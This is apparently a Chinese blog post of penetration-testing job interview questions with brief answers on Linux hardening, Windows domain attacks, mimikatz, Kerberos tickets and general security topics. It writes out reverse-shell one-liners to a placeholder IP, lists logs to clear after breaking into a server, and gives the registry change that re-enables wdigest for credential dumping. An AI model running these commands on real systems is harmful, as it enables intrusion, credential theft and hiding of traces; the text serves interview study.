大家好,我是Dest1ny。
废话不多说,继续发面试题。
xdm直接多多点赞!!(下面是上一篇的)
想入职网络安全?小白必看面试题(全网最详细版)(二)-CSDN博客
想入职网络安全?小白必看面试题(全网最详细版)-CSDN博客
Linux 相关
1. 守护进程的概念及生成方式 (★)
守护进程:是运行在后台的进程,不受终端控制,独立于用户会话,一般用于系统服务程序。
生成方法:
- 调用
fork()
生成子进程 - 在子进程中调用
setsid()
使其成为新会话的领导进程 - 使用
chdir()
更改工作目录到根目录 - 关闭标准输入输出描述符
2. Linux 服务器的安全运维操作及如何保护 SSH (★★)
安全运维操作:
- 定期更新系统补丁
- 禁用不必要的服务
- 使用防火墙限制访问
SSH 保护措施:
- 更改默认端口
- 禁用 root 用户登录
- 强制使用公钥认证
- 配置 Fail2Ban 防止暴力破解
3. 入侵 Linux 服务器后需要清除的日志 (★★)
- /var/log/auth.log(登录认证日志)
- /var/log/syslog(系统日志)
- /var/log/messages(一般信息和错误日志)
- ~/.bash_history(历史命令)
4. 反弹 shell 常用命令及类型 (★★★)
常用命令:
bash -i >& /dev/tcp/[IP]/[PORT] 0>&1
nc -e /bin/bash [IP] [PORT]
常用类型:bash
shell 常反弹 bash
是因为其轻量且广泛兼容。
5. 从主机层面如何监控反弹 shell (★★★)
- 使用
auditd
监控网络连接和命令执行 - 通过
netstat
或ss
监控反常的外部连接 - 实时监控系统进程的活动(如
ps
,lsof
等)
6. Rootkit 的种类及防护与检测 (★★)
种类:
- 用户态 Rootkit:运行在用户空间,篡改用户进程
- 内核态 Rootkit:运行在内核空间,修改系统核心
防护与检测:
- 使用完整性检测工具(如
chkrootkit
) - 启用 SELinux 或 AppArmor 加强系统权限管理
7. A 账户能否读取 B 账户的文件内容 (★)
- 不能,因为虽然 A 可以进入 766 权限的文件夹,但 B 账户文件的权限为 700,只有文件拥有者 B 可以读取。
8. SSH 软链接后门原理及其他后门实现 (★)
原理:通过创建 SSH 私钥文件的软链接,将其他用户的私钥重定向到已知密钥,实现登录。
其他后门:基于环境变量、LD_PRELOAD等技术,创建隐蔽的登录方式。
9. fork 的原理及资源拷贝问题 (★★)
原理:fork()
调用时,子进程会复制父进程的地址空间。
资源状态:子进程不会立即拷贝父进程的资源,而是使用写时复制技术。
10. R3 层和 R0 层的 HOOK 实现方式 (★)
- R3 层(用户态)HOOK:通过修改系统 API 函数地址(如 inline HOOK)。
- R0 层(内核态)HOOK:通过修改内核函数指针(如 SSDT HOOK)。
11. Linux 应用识别方式 (★)
使用 ps aux
查看进程,结合 lsof
和 /proc
文件系统,识别特定应用的二进制和配置路径。
12. 绕过命令审计的可能方法 (★★)
- 使用
LD_PRELOAD
劫持函数 - 修改执行环境(如使用别名、编译自定义命令)
13. Linux 常见提权方法 (★★)
SUID
提权:查找具有 SUID 位的程序,尝试利用漏洞提权。- 内核漏洞提权:利用未修补的内核漏洞。
- 配置错误提权:错误配置的 sudo 权限或脚本。
14. 僵尸进程和孤儿进程的区别 (★)
- 僵尸进程:子进程终止,但父进程未调用
wait()
处理其退出状态。 - 孤儿进程:父进程终止,孤儿进程由
init
进程接管。
Windows 相关
1. UAC 鉴权机制及绕过方法 (★★)
机制:通过虚拟化和用户组权限验证,防止非管理员权限修改系统文件。
Bypass 方法:利用高权限程序不进行 UAC 提升时的设计漏洞,如 fodhelper.exe
。
2. SSDT 表及 HOOK 方法 (★)
SSDT 表:存储内核模式下的系统调用。
HOOK 方法:通过修改 SSDT 表项,将目标系统调用重定向至恶意代码。
3. Windows 权限控制及模型 (★)
Windows 使用基于访问控制列表 (ACL) 的权限模型,结合 SID 进行权限校验。
4. psexec 的实现原理 (★)
通过 SMB 协议,将命令通过 svcctl
服务远程执行。
5. Kerberos 的攻击方式 (★★★)
- Pass-the-Ticket:使用窃取的票据直接认证。
- Golden Ticket:使用 krbtgt 凭证生成伪造票据。
6. Win10/Server2012 下使用 mimikatz 方式 (★★)
通过修改注册表启用 wdigest
,在不重启的情况下获取 NTLM 凭证。
7. 内网域间信任关系查询 (★)
使用 nltest /domain_trusts
可以查询域之间的信任关系。
8. 常见域控开放端口 (★)
- 389 (LDAP)
- 445 (SMB)
- 88 (Kerberos)
9. cobalt strike 的上线方式及绕过 (★★)
常见上线方式包括 HTTP/HTTPS Beacon、DNS Beacon。
绕过监控的方式是通过混淆流量或使用自定义编码器。
10. windows 应急响应中查看的日志 ID (★★★)
- ID 4624:成功的登录事件
- ID 4625:登录失败事件
- ID 4720:新用户创建事件
11. golden ticket 和 sliver ticket 的区别 (★★★)
- Golden Ticket:使用
krbtgt
凭证伪造的 TGT(Ticket Granting Ticket),可以访问整个域的资源,基本不受时间限制。 - Silver Ticket:使用服务账户的凭证伪造的 TGS(Ticket Granting Service),只能访问特定服务,权限较小。
12. sliver ticket 的前置条件是什么 (★)
获取目标服务的服务账户的密码哈希(如 NTLM hash)是前提条件。
13. 非域主机情况下快速发现域主机的方法 (★★)
- 利用
net view
命令枚举网络内的域主机。 - 通过尝试连接常见域服务端口(如 LDAP、Kerberos)来识别域控制器。
14. mimikatz 的原理及补丁的影响 (★★)
原理:mimikatz
通过提取 LSASS 进程内存中的明文密码、哈希和凭证。
补丁影响:微软通过更新禁用 wdigest
身份验证协议中的明文存储功能,导致 mimikatz
无法获取明文凭证。绕过方法可以通过重新启用 wdigest
进行。
15. 不重启机器启用 wdigest 的方法 (★)
使用注册表编辑器修改键值 HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest
,将 UseLogonCredential
设置为 1
,无需重启即可启用 wdigest
。
16. NTLM relay 的攻击场景及限制 (★)
攻击场景:通过中间人攻击(MITM)中继认证请求,将合法用户的身份凭证中继到另一台机器,从而获取目标系统访问权限。
限制:需要目标服务器允许 NTLM 认证,且 SMB 签名未强制启用。
17. Windows 用户身份鉴别及 SID 的概念 (★)
SID(安全标识符):Windows 系统用来唯一标识用户和组的标识符。
SID History 攻击:攻击者利用历史 SID 将低权限账户的权限提升为高权限账户,从而绕过权限检查。
18. 拿到域机器权限但没有域账户时的域渗透 (★★)
- 利用本地缓存的凭证(如 NTLM hash 或 Kerberos TGT)
- 尝试横向移动,利用服务账户权限进行域渗透
19. 域初始化配置允许任何用户登录任意机器的原因 (★)
这是默认的域策略,允许经过身份验证的域用户登录域内任何机器。可以通过修改组策略限制用户登录特定机器。
20. 查询域管登录过的机器的方法 (★)
- 使用
eventvwr
查看 Windows 事件日志中的登录记录(ID 4624)。 - 通过域控制器的安全日志进行筛选和分析。
其他安全相关
1. RSA 加解密流程 (★)
- 加密:发送方用接收方的公钥加密消息,只有接收方的私钥能解密。
- 解密:接收方用自己的私钥解密收到的消息。
- 签名:发送方用自己的私钥对消息签名,接收方用发送方的公钥验证签名。
- 验证:接收方使用发送方的公钥验证签名,确保消息未被篡改。
2. HTTPS 的实现机制 (★★)
- TLS/SSL 协议:HTTPS 使用 TLS/SSL 协议加密 HTTP 通信,确保数据传输的机密性和完整性。
- 数字证书:服务器通过数字证书证明其身份,客户端通过证书验证服务器是否可信。
- 加密过程:采用非对称加密传输密钥,之后使用对称加密传输数据。
3. 防护运营商的 DNS 劫持/链路劫持 (★★)
- 使用加密 DNS(如 DoH 或 DoT)防止 DNS 劫持
- 使用 VPN 或代理服务绕过链路劫持
- 确保使用 HTTPS 连接,避免明文传输数据被拦截
4. 防范羊毛党的措施 (★)
- 设备指纹:通过设备特征识别用户,防止重复注册。
- IP 限制:限制相同 IP 地址的操作频率。
- 行为分析:通过用户行为进行分析,识别异常活动。
5. 处理大范围影响的 0day 漏洞的措施 (★★)
- 立即检查自身系统是否受影响,应用临时修复措施
- 配合厂商及时部署官方补丁
- 实时监控网络和系统日志,检测可能的入侵迹象
- 对关键系统进行紧急加固,防止漏洞被利用